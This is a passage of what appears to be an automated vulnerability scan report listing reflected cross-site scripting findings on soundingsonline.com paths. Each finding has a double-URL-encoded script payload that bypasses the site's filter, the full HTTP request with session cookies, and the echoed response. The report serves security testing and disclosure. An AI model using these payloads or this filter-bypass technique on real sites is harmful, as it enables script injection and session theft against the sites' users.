...[SNIP]...
<link href="/boat-shop/new-gear?45204"><script>alert(1)</script>a0b510e9b6=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.872. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-powerboats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1935b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e64e63626ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1935b"><script>alert(1)</script>64e63626ef9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/on-powerboats?1935b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e64e63626ef9=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/on-powerboats?1935b"><script>alert(1)</script>64e63626ef9=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.873. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-sailboats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c395%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9f14107a73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c395"><script>alert(1)</script>c9f14107a73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/on-sailboats?9c395%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9f14107a73=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/on-sailboats?9c395"><script>alert(1)</script>c9f14107a73=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.874. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/q-a-a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a4df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebfc7457ca33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5a4df"><script>alert(1)</script>bfc7457ca33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/q-a-a?5a4df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebfc7457ca33=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/q-a-a?5a4df"><script>alert(1)</script>bfc7457ca33=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.875. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/sea-savvy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76c48%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04a044d541e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76c48"><script>alert(1)</script>04a044d541e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/sea-savvy?76c48%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04a044d541e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/sea-savvy?76c48"><script>alert(1)</script>04a044d541e=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.876. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/tech-talk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fde49%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1781c9806e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fde49"><script>alert(1)</script>f1781c9806e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/tech-talk?fde49%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1781c9806e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/tech-talk?fde49"><script>alert(1)</script>f1781c9806e=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.877. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/used-boat-review

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7387%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf6ee365ffe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7387"><script>alert(1)</script>af6ee365ffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/used-boat-review?e7387%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf6ee365ffe=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

4.878. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/calendar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d96a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaf5dd54016 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d96a3"><script>alert(1)</script>baf5dd54016 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /calendar?d96a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaf5dd54016=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<a href="/calendar?d96a3"><script>alert(1)</script>baf5dd54016=1&start=15" title="2">
...[SNIP]...

4.879. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/career-opportunities

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb51040a3d63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fd36"><script>alert(1)</script>b51040a3d63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /career-opportunities?9fd36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb51040a3d63=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/career-opportunities?9fd36"><script>alert(1)</script>b51040a3d63=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.880. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e172f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e12aae247207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e172f"><script>alert(1)</script>12aae247207 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /columns-blogs?e172f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e12aae247207=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs?e172f"><script>alert(1)</script>12aae247207=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.881. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/bay-tripper

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f903b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effe0e5a13b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f903b"><script>alert(1)</script>ffe0e5a13b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /columns-blogs/bay-tripper?f903b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effe0e5a13b4=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/bay-tripper?f903b"><script>alert(1)</script>ffe0e5a13b4=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.882. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/books

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e793223f03aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8fe9a"><script>alert(1)</script>793223f03aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /columns-blogs/books?8fe9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e793223f03aa=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/books?8fe9a"><script>alert(1)</script>793223f03aa=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.883. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/new-england-fishing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e9a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66943ccc600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e9a3"><script>alert(1)</script>66943ccc600 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /columns-blogs/new-england-fishing?6e9a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66943ccc600=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

4.884. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/under-way

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87b09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbc2528d353 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 87b09"><script>alert(1)</script>cbc2528d353 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /columns-blogs/under-way?87b09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbc2528d353=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

4.885. http://www.soundingsonline.com/component/yvcomment/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/yvcomment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b994%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e013ba99ca1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b994"><script>alert(1)</script>013ba99ca1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /component/yvcomment/?6b994%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e013ba99ca1c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

